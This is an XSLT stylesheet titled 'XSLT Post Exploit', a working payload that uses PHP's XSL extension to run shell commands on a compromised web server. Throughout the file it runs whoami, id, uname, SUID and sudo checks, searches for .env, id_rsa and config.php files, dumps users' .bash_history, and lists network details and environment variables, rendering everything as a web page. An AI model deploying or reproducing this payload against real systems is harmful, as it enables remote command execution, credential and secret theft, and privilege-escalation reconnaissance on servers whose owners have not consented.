<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:php="http://php.net/xsl">

  <xsl:template match="*">
    <html><body style="background-color:#111;color:#eee;font-family:monospace;">
      <h2>🔍 Post-Exploitation Enum - www-data</h2>
      <hr/>

      <h3>📛 ID & User</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'whoami')" /></pre>
      <pre><xsl:value-of select="php:function('shell_exec', 'id')" /></pre>

      <h3>💻 System Info</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'uname -a')" /></pre>
      <pre><xsl:value-of select="php:function('shell_exec', 'cat /etc/os-release')" /></pre>

      <h3>📁 Home Dirs</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'ls -la /home')" /></pre>

      <h3>🧑‍🔧 Crontabs</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'ls -la /etc/cron* 2>/dev/null')" /></pre>

      <h3>🛠️ SUID Binaries</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'find / -perm -4000 -type f 2>/dev/null | grep -vE \"(snap|docker|chromium|mount)\"')" /></pre>

      <h3>🧪 sudo -l</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'sudo -l 2>/dev/null')" /></pre>

      <h3>🔐 Interesting Files</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'find / -name \".env\" -o -name \"id_rsa\" -o -name \"config.php\" 2>/dev/null')" /></pre>

      <h3>🧾 .bash_history (if any)</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'cat /home/*/.bash_history 2>/dev/null')" /></pre>

      <h3>🌍 Network</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'ip a; netstat -tulnp 2>/dev/null')" /></pre>

      <h3>🧬 Environment</h3>
      <pre><xsl:value-of select="php:function('shell_exec', 'env')" /></pre>

      <hr/>
      <p style="font-size:smaller;">Generated by <strong>XSLT Post Exploit</strong></p>

    </body></html>
  </xsl:template>
</xsl:stylesheet>
